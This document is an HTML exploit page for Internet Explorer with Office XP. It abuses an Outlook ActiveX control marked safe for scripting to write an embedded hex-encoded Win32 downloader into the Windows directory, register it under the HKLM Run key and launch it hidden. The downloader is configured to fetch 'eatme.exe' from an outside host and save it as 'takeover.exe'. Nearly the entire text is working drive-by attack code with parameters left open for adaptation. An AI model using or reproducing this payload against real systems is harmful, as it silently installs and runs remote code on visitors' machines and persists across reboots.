<HTML>
<HEAD>
<TITLE>MS INTERNET EXPLORER + OFFICEXP FULL DISCLOSURE EXPLOIT</TITLE>
</HEAD>
<BODY>
<!-- this object, installed by officeXP will allow us to load -->
<!-- unsafe objects. Someone at M$ made a big mistake by making this -->
<!-- object "safe for scripting" which means it can be loaded from -->
<!-- internet explorer or outlook (express) -->
<OBJECT id="InterfaceObject" classid="clsid:0006F063-0000-0000-C000-000000000046" WIDTH=0 HEIGHT=0>
	<param name="folder" value="Inbox">
</OBJECT>

<SCRIPT LANGUAGE="VBSCRIPT">
<!-- hide for safe browsers

dim FileContent,fso,windir,file,filename,key,wshshell,landurl,overflow,dnloadurl

'the 3 main steps in this script
SetupFile
Upload
Run

'sets up the binary data of downloader.exe in memory
sub SetupFile()
	'we set up the filecontent variable which contains the binary data
	'of downloader.exe, its parameters are parsed into the file directly
	'using this script, adapt them to your needs
	FileContent=Array()
	FileContent=decode("4D5A50000200000004000F00FFFF0000B80000000000000040001A"+wstring("0",69)+"10000BA10000E1FB409CD21B8014CCD219090546869732070726F6772616D206D7573742062652072756E20756E6465722057696E33320D0A2437"+wstring("0",272)+"504500004C010400342ABB940000000000000000E0008E810B01021900040000000C000000000000191000000010000000200000000040000010000000020000010000000000000003000A00000000000050000000040000000000000100000000001000002000000000100000100000000000001000000000000000000000000030000022020000000000000000000000000000000000000000000000000000004000009C"+wstring("0",166)+"434F44450000000000100000001000000004000000060000000000000000000000000000200000604441544100000000001000000020000000060000000A0000000000000000000000000000400000C02E6964617461000000100000003000000004000000100000000000000000000000000000400000C02E72656C6F630000001000000040000000020000001400000000000000000000000000004000005"+wstring("0",1745)+"C8000000FF7508E8A1020000FF750C50E886020000C9C208006800204000E88A020000680920400050E86D02000083F800740A909090906A016A00FFD068282040006801010000E8790200000BC0740690909090EBE7680001000068B4214000E8540200000BC075ED68B4214000E84C0200000BC074DF508B008B185883C00483FB0075F283C0048B008B008B003D7F0000017510909090906810270000E810020000EBB168004000006A40E8F001000083F80074EFA3C923400068DD23400068D5234000E836FFFFFF83F80074ECA32124400068EB23400068D5234000E81DFFFFFF83F80074ECA32524400068FC23400068D5234000E804FFFFFF83F80074ECA329244000680D24400068D5234000E8EBFEFFFF83F80074ECA32D2440006A006A006A006A0068B6234000FF1521244000A3C12340006A006A0068FF0000006A0068B4224000FF35C1234000FF1525244000A3C52340006A0068800000006A026A006A0068000000C06834234000E80F01000083F8FF74DFA3D123400068CD2340006800400000FF35C9234000FF35C5234000FF1529244000833DCD234000007424909090906A0068CD234000FF35CD234000FF35C9234000FF35D1234000E8B8000000EBB7FF35C1234000FF152D244000FF35C5234000FF152D244000FF35D1234000E88D000000FF35C9234000E8B20000006831244000E896000000C7055D2440000100000066C7056124400001006875244000683124400068B42340006A0068100200046A006A006A0068342340006A00E84F0000006889244000688D244000FF3585244000E87C00000068BB244000FF3589244000E872000000FF3589244000E86D0000006A00E81E000000FF25A4304000FF25A8304000FF25AC304000FF25B0304000FF25B4304000FF25B8304000FF25BC304000FF25C0304000FF25C4304000FF25C8304000FF25CC304000FF25D0304000FF25D8304000FF25DC304000FF25E0304000FF25E8304000FF25EC304000FF25F0304"+wstring("0",585)+"4B45524E454C33320052656769737465725365727669636550726F63657373"+wstring("0",1322))
	'WIN32ASM DOWNLOADER PARAMETER 1 : DOWNLOAD URL
	dnloadurl="http://www.duho.org/eatme.exe"
	overflow=0
	if len(dnloadurl) > 29 then overflow = len(dnloadurl)-29
	FileContent=FileContent+dnloadurl+chr(0)+wstring("A",98-overflow)
	'WIN32ASM DOWNLOADER PARAMETER 2 : TARGET LOCATION (incl. drive+path)
	landurl = "/takeover.exe"
	overflow=0
	if len(landurl) > 13 then overflow = len(landurl)-13
	FileContent=FileContent+landurl+chr(0)+wstring("A",114-overflow)
	FileContent=FileContent+decode("2F005B42797465526167655D00000000000000000000000000000000000000000057494E494E455400496E7465726E65744F70656E4100496E7465726E65744F70656E55726C4100496E7465726E65745265616446696C6500496E7465726E6574436C6F736548616E646C65"+wstring("0",203)+"200008000000000536F6674776172655C4D6963726F736F66745C57696E646F77735C43757272656E7456657273696F6E5C52756E0077696E333836"+wstring("0",638)+"503000000000000000000000F8300000A430000084300000000000000000000005310000D830000094300000000000000000000011310000E830000000000000000000000000000000000000000000001E3100002831000036310000423100005031000062310000703100008231000094310000A2310000B0310000C031000000000000C8310000D6310000E631000000000000F43100000232000014320000000000001E3100002831000036310000423100005031000062310000703100008231000094310000A2310000B0310000C031000000000000C8310000D6310000E631000000000000F43100000232000014320000000000004B45524E454C33322E646C6C0057534F434B33322E646C6C0041445641504933322E646C6C00000057696E45786563000000436C6F736548616E646C65000000577269746546696C6500000043726561746546696C654100000043726561746550726F6365737341000000004578697450726F6365737300000047657453746172747570496E666F4100000047657450726F634164647265737300000000476C6F62616C416C6C6F63000000476C6F62616C46726565000000004C6F61644C6962726172794100000000536C656570000000676574686F73746E616D65000000676574686F737462796E616D6500000057534153746172747570000000005265674F70656E4B65794100000052656744656C65746556616C756541000000526567436C6F73654B6579"+wstring("0",960)+"1000009C0000001A3024303E305C306A30B730BC30C130D030D530DA30E930EE30F330023107310C311B3128312E313331433149314F3154316B317A317F318A31903196319C31AA31B031B631BC31C931CF31D531DB31E131EC31F63101320C32133218321D322F323B3240324632503256326132733279327F3285328B32913297329D32A332A932AF32B532BB32C132C732CD32D332D932"+wstring("0",5838))
end sub

'writes downloader.exe to disk in the windows directory
sub Upload()
	'set up the object, and use it to load the filesystemobject,
	'enabling us (among other things) to write stuff to disk
	set inbox = InterfaceObject.object.selection
	set mail = inbox.Item(1)
	set fso = mail.Session.Application.CreateObject("Scripting.FileSystemObject")
	'get the windoze dir and write downloader.exe (=FileContent) to disk
	windir = fso.getspecialfolder(0)
	filename = "downloader.exe"
	set file = fso.opentextfile(windir+"\"+filename, "2", "TRUE")
	file.write FileContent
	file.close()
end sub

sub Run()
	'set up the object, and use it to load the windows shell object,
	'enabling us to write registry keys
	'and run files
	key = "HKLM\Software\Microsoft\WinNT\CurrentVersion\Run\win386" 
	set wshShell = mail.Session.Application.CreateObject("WScript.Shell")
	wshShell.regwrite key,filename
	wshShell.run filename,"0","FALSE"
	set wshShell = Nothing
	set fso = Nothing
	set inbox = Nothing
	set mail = Nothing
	set file = Nothing
end sub

'function that decodes our fake-ascii-hex-binary into true binary
Function Decode(Text)
	dim x,thebyte,temptext
	For x = 1 To Len(Text) Step 2
		thebyte = Chr(38) & "H" & Mid(Text, x, 2)
		temptext = temptext & Chr(thebyte)
	Next
	Decode = temptext
End Function

'function that offers us simple compression, by replacing e.g. 1000 zero 
'characters ("000...") by one function name: wstring("0",1000)
function wstring(text,times)
	dim x
	for x=1 to times
		wstring = wstring & text
	next
end function
-->
</script>

<noscript>
Sorry, you have to view this page with Internet Explorer 4.0 or higher, <br> also enable scripting, activex  and <br>
install officeXP in order to be vulnerable.
</noscript>

</BODY>
</HTML>